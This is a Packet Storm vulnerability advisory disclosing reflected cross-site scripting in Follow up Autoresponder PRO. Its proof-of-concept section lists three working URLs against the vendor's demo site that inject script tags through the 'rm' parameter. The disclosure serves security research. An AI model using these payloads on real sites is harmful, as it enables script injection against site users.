Autoresponder PRO Cross Site Scripting

2014-01-20T00:00:00
ID PACKETSTORM:124853
Type packetstorm
Reporter TUNISIAN CYBER
Modified 2014-01-20T00:00:00

Description

                                        
                                            `[+] Author: TUNISIAN CYBER  
[+] Exploit Title: Follow up Autoresponder PRO Cross Site Scripting vulnerability  
[+] Date: 09-01-2014  
[+] Category: WebApp  
[+] Google Dork: :  
[+] Tested on: KaliLinux  
[+] Vendor: http://www.scripts4webmasters.com/  
[+] Friendly Sites: na3il.com,th3-creative.com  
###############################################################  
+Description:  
Web based php/mysql email list management software where you can get subscriber names, email addresses to do contact management email marketing.  
  
+Exploit:  
Follow up Autoresponder PRO suffers from a Cross Site Scripting vulnerability  
  
+PoC:(Tested on Demo)  
http://www.scripts4webmasters.com/arppro-demo/?rm=send_login_info'%22()%26%25<ScRiPt%20>prompt(986987)</ScRiPt>  
http://www.scripts4webmasters.com/arppro-demo/?rm=license'%22()%26%25<ScRiPt%20>prompt(941203)</ScRiPt>  
http://www.scripts4webmasters.com/arppro-demo/?rm=send_login_info'%22()%26%25<ScRiPt%20>prompt(918540)</ScRiPt>  
  
########################################################################################  
Greets to: XMaX-tn, N43il HacK3r, XtechSEt  
Sec4Ever Members:  
DamaneDz  
UzunDz  
GEOIX  
########################################################################################  
`